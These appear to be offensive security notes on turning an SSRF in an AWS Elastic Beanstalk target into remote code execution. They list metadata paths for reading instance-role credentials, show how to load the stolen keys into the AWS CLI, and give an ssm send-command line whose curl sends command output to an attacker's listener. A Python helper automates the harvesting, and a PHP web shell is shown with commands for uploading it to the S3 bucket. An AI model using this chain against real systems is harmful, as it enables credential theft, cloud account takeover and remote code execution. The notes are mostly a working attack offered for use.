Notes on AWS-hosted targets, mainly on turning an SSRF into RCE.

Header key (a response header that tells you CloudFront/AWS sits in front of the target)

X-Amz-Cf-Id

AWS environment

How to identify the service

  • /latest/meta-data/iam/security-credentials/ (on the instance metadata endpoint, 169.254.169.254; the listing returns the instance role name, which fingerprints the service)
    • aws-elasticbeanstalk-ec2-role: AWS Elastic Beanstalk

Caveat: these paths answer a plain GET only under IMDSv1. If the instance enforces IMDSv2, the metadata service requires a token obtained with a PUT request first, so a GET-only SSRF gets 401 and this whole chain stops here.

AWS Elastic Beanstalk

What is AWS Elastic Beanstalk?

  • AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go.
  • It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

Information disclosure

Get AccessKeyId, SecretAccessKey and Token (temporary credentials of the instance role)

  • /latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/

Get instanceId, accountId and region (from the instance identity document)

  • /latest/dynamic/instance-identity/document/

How to use credential information

Setting up the environment

Fill the placeholders with the values read from the two metadata documents above. The session token is mandatory: instance-role keys are temporary STS credentials and are rejected without it.

~# apt install awscli
~# export AWS_ACCESS_KEY_ID=AccessKeyId
~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey
~# export AWS_DEFAULT_REGION=region
~# export AWS_SESSION_TOKEN=Token

Get the caller identity (confirms the keys work and shows the account and the assumed role)

aws sts get-caller-identity

Escalate

Method 1: ssm send-command

Run whoami on the instance and exfiltrate the result to a listener you control (the listener address is redacted in the original):

aws ssm send-command --instance-ids "instanceId" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 128.199.xx.xx:8080/`whoami`' --output text --region region

This only works if the instance role is allowed ssm:SendCommand and the target is managed by Systems Manager (SSM agent running); otherwise the call fails with AccessDenied or InvalidInstanceId.
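The harvesting steps above (fingerprint the role, read the two IMDS documents, set the environment, build the ssm send-command call) and the bucket-name construction used in the S3 steps further down, tied together as one added Python example. This is not code from the original page: it works on constructed IMDS response bodies embedded inline, every value in them is made up, and the ssm call is built as an argv list to hand to subprocess rather than a shell line.

```python
"""Added example: harvest IMDS output obtained through SSRF and prepare the next steps."""
import json
import shlex
from datetime import datetime, timezone

# Constructed sample bodies shaped like the IMDS documents the page reads.
# Every value here is made up for this example.
SAMPLE_ROLE_LISTING = "aws-elasticbeanstalk-ec2-role\n"
SAMPLE_CREDENTIALS = json.dumps({
    "Code": "Success",
    "LastUpdated": "2019-07-01T10:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLE0000000000",
    "SecretAccessKey": "ExampleSecretKey0000000000000000000000",
    "Token": "ExampleSessionToken",
    "Expiration": "2019-07-01T16:00:00Z",
})
SAMPLE_IDENTITY = json.dumps({
    "accountId": "123456789012",
    "instanceId": "i-0abcdef1234567890",
    "region": "us-east-1",
    "availabilityZone": "us-east-1a",
    "privateIp": "10.0.1.23",
})
SAMPLE_NOW = datetime(2019, 7, 1, 12, 0, tzinfo=timezone.utc)  # assumed clock

# The one role name the page fingerprints; anything else is reported as unknown.
KNOWN_ROLES = {"aws-elasticbeanstalk-ec2-role": "AWS Elastic Beanstalk"}


def identify_services(role_listing):
    """Map each role name from /latest/meta-data/iam/security-credentials/ to a service."""
    return {name: KNOWN_ROLES.get(name, "unknown (custom role)")
            for name in role_listing.split()}


def parse_credentials(body):
    """Pull the values the CLI needs from the security-credentials document."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError("IMDS returned no usable credentials: %r" % doc.get("Code"))
    expiry = datetime.strptime(doc["Expiration"], "%Y-%m-%dT%H:%M:%SZ")
    return {
        "access_key_id": doc["AccessKeyId"],
        "secret_access_key": doc["SecretAccessKey"],
        "session_token": doc["Token"],
        "expiration": expiry.replace(tzinfo=timezone.utc),
        # Instance-role keys are temporary STS credentials (ASIA... prefix):
        # without AWS_SESSION_TOKEN every API call is rejected.
        "temporary": doc["AccessKeyId"].startswith("ASIA"),
    }


def parse_identity(body):
    """Take instanceId, accountId and region from the instance identity document."""
    doc = json.loads(body)
    return {"instance_id": doc["instanceId"], "account_id": doc["accountId"],
            "region": doc["region"]}


def seconds_until_expiry(creds, now):
    """Remaining lifetime of the keys; IMDS rotates them, so re-fetch when this gets low."""
    return (creds["expiration"] - now).total_seconds()


def env_exports(creds, region):
    """The four export lines from the 'Setting up the environment' section, shell-quoted."""
    pairs = [("AWS_ACCESS_KEY_ID", creds["access_key_id"]),
             ("AWS_SECRET_ACCESS_KEY", creds["secret_access_key"]),
             ("AWS_DEFAULT_REGION", region),
             ("AWS_SESSION_TOKEN", creds["session_token"])]
    return ["export %s=%s" % (k, shlex.quote(v)) for k, v in pairs]


def beanstalk_bucket(region, account_id):
    """Default Elastic Beanstalk bucket name: elasticbeanstalk-<region>-<account-id>."""
    return "elasticbeanstalk-%s-%s" % (region, account_id)


def ssm_send_command_argv(instance_id, region, shell_command, comment="whoami"):
    """argv for the page's ssm send-command; a list, so no shell quoting is needed."""
    return ["aws", "ssm", "send-command",
            "--instance-ids", instance_id,
            "--document-name", "AWS-RunShellScript",
            "--comment", comment,
            "--parameters", "commands=%s" % shell_command,
            "--output", "text",
            "--region", region]


def harvest(role_listing, credentials_body, identity_body, now):
    """Tie the steps together: fingerprint, parse, then emit what gets run next."""
    creds = parse_credentials(credentials_body)
    ident = parse_identity(identity_body)
    return {
        "services": identify_services(role_listing),
        "identity": ident,
        "temporary_credentials": creds["temporary"],
        "expires_in_s": seconds_until_expiry(creds, now),
        "exports": env_exports(creds, ident["region"]),
        "bucket": beanstalk_bucket(ident["region"], ident["account_id"]),
        "ssm_argv": ssm_send_command_argv(ident["instance_id"], ident["region"], "whoami"),
    }


if __name__ == "__main__":
    print(json.dumps(harvest(SAMPLE_ROLE_LISTING, SAMPLE_CREDENTIALS,
                             SAMPLE_IDENTITY, SAMPLE_NOW), indent=2, default=str))
```

The expiry check matters in practice: the keys returned by IMDS are short-lived, so a long engagement has to go back through the SSRF to refresh them, and the "temporary" flag is the reminder that the fourth export line is not optional.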

Method 2: ssh

“creating a RSA authentication key pair (public key and private key), to be able to log into a remote site from the account, without having to type the password.”

Step 1: Use the region and account ID from the identity document to construct the bucket name

elasticbeanstalk-<region>-<account-id>

for example:

elasticbeanstalk-us-east-1-76xxxxxxxx00

Step 2: Use aws s3 ls to list the bucket contents recursively

aws s3 ls s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ --recursive

Step 3: Upload a backdoor

cmd.php (a minimal PHP web shell; runs whatever arrives in the cmd parameter)

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

aws s3 cp cmd.php s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/
upload: ./cmd.php to s3://docs.redact.com/cmd.php

Note that the recorded output shows the file landing in a different bucket (docs.redact.com) than the Beanstalk one. The Beanstalk bucket holds application source bundles and logs, so a PHP file dropped there only becomes RCE once something deploys or serves it; writing into a bucket that is actually served by the application is what turns the upload into code execution.
